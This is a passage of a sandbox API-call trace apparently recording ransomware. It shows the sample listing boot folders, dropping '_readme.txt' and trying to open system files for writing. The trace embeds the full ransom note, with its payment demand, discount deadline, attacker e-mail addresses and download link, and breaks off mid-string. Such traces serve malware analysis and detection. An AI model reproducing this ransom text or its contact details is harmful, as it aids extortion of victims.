hHeap=0x630000) returned 1 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.064] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0228.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.064] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.064] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.064] PathFindFileNameW (pszPath="") returned="" [0228.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0228.064] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.065] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.065] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0228.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.065] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.065] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0228.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.065] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0228.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.065] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0228.065] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0228.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0228.066] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.066] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.066] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.066] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.066] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0228.066] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.067] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.067] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0228.067] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0228.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0228.067] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0228.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0228.067] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0228.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.067] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.067] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.067] PathFindFileNameW (pszPath="") returned="" [0228.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.067] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0228.068] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0228.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0228.068] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0228.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.068] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.068] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0228.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.068] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0228.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0228.068] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and 